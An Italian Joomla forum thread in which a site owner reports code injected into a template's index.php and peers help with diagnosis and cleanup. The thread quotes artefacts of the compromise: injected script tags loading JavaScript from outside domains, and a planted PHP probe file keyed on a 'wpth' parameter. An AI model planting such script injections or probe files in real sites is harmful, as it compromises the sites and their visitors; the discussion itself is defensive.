codice strano in index.php del template

[markuty]

scusate ma...
mi son trovato questo codice tra i tag php iniziali dell'index.php del template

<?php
defined('_JEXEC') or die('Restricted access');
echo '<?xml version="1.0" encoding="utf-8"?'.'>';
... (codice cancellato)...
?>
ovviamente l'ho cancellato, ma cosa è?
devo preoccuparmi?
grazie

[Murphz]

Mai visto niente del genere, comunque la decodifica della stringa è:

Codice: [Seleziona]

<script src="http://www.asca.it/js/jquery.tools.min.js"> </script>


quindi "niente di preoccupante"....penso.

[markuty]

ok, grazie Murphz
per ora funziona tutto
farò una scansione del sito per vedere se c'è dell'altro
cmq mi sta sul c.... che qualcuno si sia inserito

[mau_develop]

scusa ma il sito asca.it è tuo?
da dove hai preso il template?
che joomla è?
aggiornato tutto?

M.

[markuty]

Ciao mau,

no... il sito asca.it non è mio!
il template l'ho preso dal calderone e modificato html/css
joomla è la 1.5.25
tutto aggiornato.
xò...
ho trovato in un altro mio sito lo stesso codice 
entrambi erano j 1.5.23 e mi sono accorto che c'erano
dei problemi in quanto non si aprivano i menu a tendina del menu amministratore,
ho aggiornato ed ha ripreso a funzionare tutto in entrambi,
poi mi sono accorto di questo codice ed ho postato.
se puo servire:
il server è x entrambi "sgaragnao"
pochi componenti, JCE (aggiornato) e QContac (ho letto... devo cambiarlo, spero non sia tardi)

[Murphz]

no... il sito asca.it non è mio!

allora, per quanto il file è (o sembra) essere la libreria jquery...non è normale che sia il sito asca.it a caricarla.
All'inizio pensavo a qualche componente o cose così, ma è il sito di un agenzia di stampa 


Non saprei dirti la causa, qcontact ha problemi di sicurezza...ma bhò, non saprei proprio dirti.

[mau_develop]

o dietro quel js non trovi jquery o sei stato usato come cavia per provare qualche esploit.

Comunque sia poco importa leggi il post in testa alla sezione e sistema ... leggilo tutto però perchè non è proprio banale

M.

[markuty]

grazie murphz e mau,

ho letto tutto il post e non lo ritengo affatto banale,
ho backup puliti, ma x ora non li installo
voglio vedere che succede
se ricompare e da dove nasce
(spero in un vostro aiuto)
se sono la cavia voglio essere anche la cura 
vi terrò aggiornati sugli sviluppi...

[mau_develop]

in che senso da dove nasce... hai una versione di joomla e/o qualche estensione bucata e ti iniettano codice...
se cerchi nei db di vulnerabilità lo vedi cosa succede basta che applichi l'esploit alla versione obsoleta.

se sono la cavia voglio essere anche la cura
---------------------------------------------------------------
mannò, la cura l'hanno già trovata, solo che bisogna stargli dietro ai siti, mantenerli sempre aggiornati.
Stai attento a giocare con il codice malevolo... non ti accorgi di nulla ma qualcosa succede , anzi io lo toglierei quel link nei primi post, se il sito nn è tuo

M.

[markuty]

novità...
controllando i file in ftp, nella root di entrambi i siti ho trovato due file (uno x sito, con data creazione 02-02-12) session.php e int.php
con all'interno questa stringa:

<? error_reporting(0); if(@$_GET['wpth']){ echo "./www.nomesito.it/index.php"; }?> (ke vuol di?)

ovviamente eliminati all'istante!

Inoltre ho installato la pach di qcontact 1062_revised
e il plugin Marco's SQL Injection - LFI Interceptor

[markuty]

aiuto...
ho quasi tutti i siti con lo stesso problema !!!
ma caz... non ho virus nel pc

con firebug in un sito ho trovato questo nella head:

<script src="http://www.studenti.it/download/sq.js"><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /download/sq.js was not found on this server.</p> <address>Apache Server at www.studenti.it Port 80</address> </body></html> </script>

[mau_develop]

ovviamente l'ho cancellato,....
.----------------------------------------
si ma se ne scrivi altri siamo daccapo

...non ti dico più di leggere il post in testa alla sez e scegliere una strada per ripristinare....

M.